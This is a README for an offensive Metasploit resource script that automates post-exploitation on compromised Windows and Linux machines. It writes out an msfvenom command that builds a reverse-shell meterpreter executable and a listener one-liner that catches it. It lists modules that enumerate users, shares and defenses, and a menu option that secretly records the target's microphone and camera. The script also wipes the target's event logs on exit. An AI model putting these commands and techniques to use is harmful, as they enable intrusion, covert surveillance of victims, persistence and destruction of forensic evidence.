-
Notifications
You must be signed in to change notification settings - Fork 40
post_exploitation.rc | offensive resource script
Resource File to automate/assiste in session post_exploitation tasks.
This script displays a menu of commands based on session platform (windows or linux).
It also querys the framework database for session ID to be able to run post-modules againts it.
And it will allow us to automatically lunch multi-post-msf-modules againts target session
Example of commands beeing executed using [Command]: gather
localtime
sysinfo
getuid
run post/windows/gather/checkvm
webcam_list
run post/multi/gather/wlan_geolocate
run post/windows/gather/enum_shares
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_computers
run post/windows/gather/enum_applications
enumdesktops
show_mount
run post/windows/recon/enum_protections
unsetg all
unset all
This script can be review here
'This script can NOT be run in meterpreter prompt because ERB code its not accepted'
'In windows platforms the script will clean target event viewer artifacts (logs) at exit'
'if none value (setg) has povided (before exec) then this script will use is own default values'
msf > setg MSF_PATH /opt/metasploit-framework
=> (absoluct path of metasploit-framework)
msf > setg REC_TIME 15
=> (timeout in sec to record using target mic/camera)
REMARK: This global settings (setg) will be clean everytime the script ends execution.
git clone https://github.com/r00t-3xp10it/resource_files.git
cd resource_files
cd aux
sudo chmod +x install.sh
sudo ./install.sh
As we can see from the above screenshot 'post_exploitation.rc' resource script requires 3 metasploit post modules written by me to assist in post-exploitation tasks, since gather info untill persiste our payload in target system or use freevulnsearch.nse nmap nse script (@Mathias Gut) to scan for possible CVEs present...
cd ..
sudo service postgresql start
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=666 -f exe -o binary.exe
msfconsole -q -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.11; set LPORT 666; exploit'
REMARK: execute binary.exe with admin privs (execute as admin)
meterpreter > background
msf > resource post_exploitation.rc
[command]: play_youtube
[+] Input youtube URL: 35Yq7ae6F8E
msf > resource post_exploitation.rc
[command]: rec_target
[+] Record audio from target microphone? (y/n): yes
[+] Record video from target camera? (y/n): yes
If we decided to use one Linux payload..
Then this script will present a diferent 'commands menu' for Linux platforms.
- post_exploitation.rc video tutorial (windows platforms)
https://www.youtube.com/watch?v=PcT-25YCdoQ